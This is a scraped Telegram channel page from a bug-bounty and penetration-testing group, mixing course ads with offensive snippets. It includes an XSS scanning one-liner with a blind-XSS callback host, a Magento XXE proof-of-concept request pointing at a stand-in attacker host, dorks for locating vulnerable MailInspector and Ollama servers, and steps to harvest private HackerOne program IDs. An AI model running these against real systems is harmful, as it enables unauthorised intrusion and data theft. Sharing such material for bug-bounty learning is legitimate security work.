Brut Security – Telegram
Brut Security
14.7K subscribers
913 photos
73 videos
287 files
969 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
🔼 One-Liner XSS 🔽

subfinder -dL domainlist1.txt | dnsx | shuf | (gau | | hakrawler) | anew | egrep -iv "\.(jpg|jpeg|gif|tif|tiff|png|ttf|woff|woff2|php|ico|pdf|noscript|txt|js)$" | urless | nilo | dalfox pipe -b https://xss.hunter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👏1
Brut Security pinned «Keep checking my old Posts to continue your learning Process!»
Methods for Dump LSASS.pdf
33.4 MB
💥Methods for Dump LSASS💥
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
☄️KnoXSS XSS Payload - confirm?.(1)
🔍Credit- @lu3ky13

#bugbounty #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
🫡4🤯2
Recon workflow.pdf
77.4 KB
👀Top 1% on TryHackMe? That’s Cute👀

🤡I've seen a lot of posts lately celebrating being in the top 1% on TryHackMe, but let's take a step back. While it's great to challenge yourself with these platforms, does ranking highly truly reflect practical, real-world experience?

🙂In the ever-evolving field of cybersecurity, hands-on experience and the ability to adapt to real-world situations are what truly count. Ranking in the top 1% on a practice platform like TryHackMe is commendable, but it shouldn't be confused with actual industry experience.

✉️Thoughts?
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤‍🔥5🔥1
☄️CVE-2024-34470: An Unauthenticated Path Traversal vulnerability in HSC Mailinspector!

📣An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.

🚫PoC: https://lnkd.in/gK4NHJ4C
⛔️Video POC: https://youtube.com/shorts/Ij8nWAZQ978?feature=share

🌐Dorks:
Hunter: web.noscript=="..:: HSC MailInspector ::.."
FOFA: noscript=="..:: HSC MailInspector ::.."
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4❤‍🔥1👍1
💥 Registration Open for July Batch: Extreme Web Application Penetration Testing 💥

⚠️Slots Remaining 4

💯Registration Link:
https://lnkd.in/g7MjfrXG

Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!


🖥 Starts: July Mid, 2024
ℹ️ Schedule: Mon, Wed, Fri | 12:00 PM - 2:00 PM IST
Mode: Online | Language: English
🔗 Course Module:
https://lnkd.in/gfZbBCFn
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
ceh-v12-exam-set.pdf
1.6 MB
☄️Sharpen your skills for the Certified Ethical Hacker v12 exam with these practice questions☄️
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Subdomain Enumeration Tools UHD.pdf
127.4 KB
Subdomain Enumeration Tools

#bugbounty #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🤡5🤣2🐳1🤝1
🔫Smap - passive Nmap like scanner built with shodan.io

😠Smap is a port scanner built with shodan.io's free API. It takes same command line arguments as Nmap and produces the same output which makes it a drop-in replacament for Nmap.

🤨 Read more: https://github.com/s0md3v/Smap

😐#infosec #cybersecurity #hacking #pentesting #security
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤‍🔥1
▶️This June Batch Filled with talented Students 🫶

👀July Batch Registration is Open
https://wa.me/message/NQLPOBIAEFDBN1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯1
Looking for someone who can contribute on the next 30 days Bug Bounty Challenge.

Similar to this https://nas.io/brutsecurity
🚨CVE-2024-37032: Probllama—Ollama Remote Code Execution Vulnerability

⚠️The issue relates to a case of insufficient input validation that results in a path traversal flaw. An attacker could exploit to overwrite arbitrary files on the server and ultimately lead to remote code execution.

🔥PoC:
https://lnkd.in/gk6Wvq_P

💥Dorks:
Hunter: /
product.name="Ollama Web"
FOFA: app="Ollama-Web"
🔥1
🛡Join The Discussion Group
🔗https://news.1rj.ru/str/brutsec
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2024-34102 POC

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}
👍8
IDOR on HackerOne Embedded Submission Form 💰 💲
-
Steps to reproduce (obtaining inactive UUID of many private programs)

1- Use this command echo 'https://hackerone.com/' | waybackurls > lists.txt make sure you have waybackurls installed on your attackbox
2- cat lists.txt | grep "embedded_submissions" > results.txt
3- cat results.txt
4- You will find a lot of embedded submission id of many random private programs, you can check it by browsing each URL
-
https://lnkd.in/drCHC6qA
-
By @japzdivino
https://x.com/japzdivino
👍3